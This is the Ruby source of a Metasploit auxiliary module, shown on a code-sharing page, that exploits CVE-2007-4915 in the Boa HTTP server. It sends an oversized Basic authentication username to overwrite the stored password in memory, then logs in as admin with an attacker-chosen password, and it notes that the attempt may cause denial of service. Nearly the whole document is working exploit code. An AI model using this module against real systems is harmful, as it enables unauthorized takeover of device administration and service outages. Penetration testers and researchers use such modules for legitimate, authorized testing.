Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name' => 'Intersil (Boa) HTTPd Basic Authentication Password Reset',
14
        'Description' => %q{
15
          The Intersil extension in the Boa HTTP Server 0.93.x - 0.94.11
16
          allows basic authentication bypass when the user string is greater
17
          than 127 bytes long.  The long string causes the password to be
18
          overwritten in memory, which enables the attacker to reset the
19
          password.  In addition, the malicious attempt also may cause a
20
          denial-of-service condition.
21

22
          Please note that you must set the request URI to the directory that
23
          requires basic authentication in order to work properly.
24
        },
25
        'Author' => [
26
          'Luca "ikki" Carettoni <luca.carettoni[at]securenetwork.it>', # original discoverer
27
          'Claudio "paper" Merloni <claudio.merloni[at]securenetwork.it>', # original discoverer
28
          'Max Dietz <maxwell.r.dietz[at]gmail.com>' # metasploit module
29
        ],
30
        'License' => MSF_LICENSE,
31
        'References' => [
32
          [ 'CVE', '2007-4915' ],
33
          [ 'BID', '25676'],
34
          [ 'PACKETSTORM', '59347']
35
        ],
36
        'DisclosureDate' => '2007-09-10'
37
      )
38
    )
39

40
    register_options(
41
      [
42
        OptString.new('TARGETURI', [ true, 'The request URI', '/']),
43
        OptString.new('PASSWORD', [true, 'The password to set', 'pass'])
44
      ]
45
    )
46
  end
47

48
  def check
49
    res = send_request_cgi({
50
      'uri' => '/',
51
      'method' => 'GET'
52
    })
53

54
    if (res && (m = res.headers['Server'].match(%r{Boa/(.*)})))
55
      vprint_status("Boa Version Detected: #{m[1]}")
56
      return Exploit::CheckCode::Safe if (m[1][0].ord - 48 > 0) # boa server wrong version
57
      return Exploit::CheckCode::Safe if (m[1][3].ord - 48 > 4)
58

59
      return Exploit::CheckCode::Vulnerable
60
    else
61
      vprint_status('Not a Boa Server!')
62
      return Exploit::CheckCode::Safe # not a boa server
63
    end
64
  rescue Rex::ConnectionRefused
65
    print_error('Connection refused by server.')
66
    return Exploit::CheckCode::Safe
67
  end
68

69
  def run
70
    return if check != Exploit::CheckCode::Vulnerable
71

72
    uri = normalize_uri(target_uri.path)
73
    uri << '/' if uri[-1, 1] != '/'
74

75
    res = send_request_cgi({
76
      'uri' => uri,
77
      'method' => 'GET',
78
      'authorization' => basic_auth(Rex::Text.rand_text_alpha(127), datastore['PASSWORD'])
79
    })
80

81
    if res.nil?
82
      print_error('The server may be down')
83
      return
84
    elsif res && (res.code != 401)
85
      print_status("#{uri} does not have basic authentication enabled")
86
      return
87
    end
88

89
    print_status('Server still operational. Checking to see if password has been overwritten')
90
    res = send_request_cgi({
91
      'uri' => uri,
92
      'method' => 'GET',
93
      'authorization' => basic_auth('admin', datastore['PASSWORD'])
94
    })
95

96
    if !res
97
      print_error('Server timedout, will not continue')
98
      return
99
    end
100

101
    case res.code
102
    when 200
103
      print_good("Password reset successful with admin:#{datastore['PASSWORD']}")
104
    when 401
105
      print_error('Access forbidden. The password reset attempt did not work')
106
    else
107
      print_status("Unexpected response: Code #{res.code} encountered")
108
    end
109
  end
110
end
111

112